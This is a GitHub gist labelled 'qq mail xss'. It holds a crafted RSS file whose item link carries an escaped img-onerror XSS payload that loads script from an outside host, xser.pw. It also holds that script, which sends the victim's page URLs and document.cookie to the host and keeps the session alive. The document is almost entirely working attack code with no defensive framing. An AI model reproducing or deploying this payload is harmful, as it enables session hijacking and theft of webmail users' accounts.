Skip to content

Instantly share code, notes, and snippets.

@chyiz

chyiz/mail.xml

Last active October 21, 2015 02:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save chyiz/bea8d52bccd198f72eb9 to your computer and use it in GitHub Desktop.
Save chyiz/bea8d52bccd198f72eb9 to your computer and use it in GitHub Desktop.
Download ZIP
qq mail xss
Raw
mail.xml
<?xml version="1.0" encoding="utf-8" ?>
<rss version="2.0">
<channel>
<title>aa<![CDATA[aaa\"aaa]]>aBEFIaaaaaa</title>
<link>bbbbbbbbbbb</link>
<description>ccccccccccccc</description>
<language>zh</language>
<image>
<title>ddddddddd</title>
<url>eeeeeee'e</url>
<link>fffffffffff</link>
<width>74</width>
<height>74</height>
<description>gggggggg</description>
</image>
<item>
<title>hhhhhhhhhhhh</title>
<link><![CDATA[iiii\x22\x3e\x3cimg src=\x22x\x22 onerror=\x22load\x4as\x46ile\x28\x27http://xser.pw/Hoi9Lm?1445073089\x27\x29]]></link>
<description>jjjjjjjjjjj</description>
<pubDate>Tue, 16 Oct 2012 02:01:28 GMT</pubDate>
<author>kkkkkkkkkkk</author>
<guid>mmmmmmmmmmmm</guid>
</item>
</channel>
</rss>
Raw
response.js
(function(){(new Image()).src='http://xser.pw/index.php?do=api&id=Hoi9Lm&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xser.pw/index.php?do=keepsession&id=Hoi9Lm&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment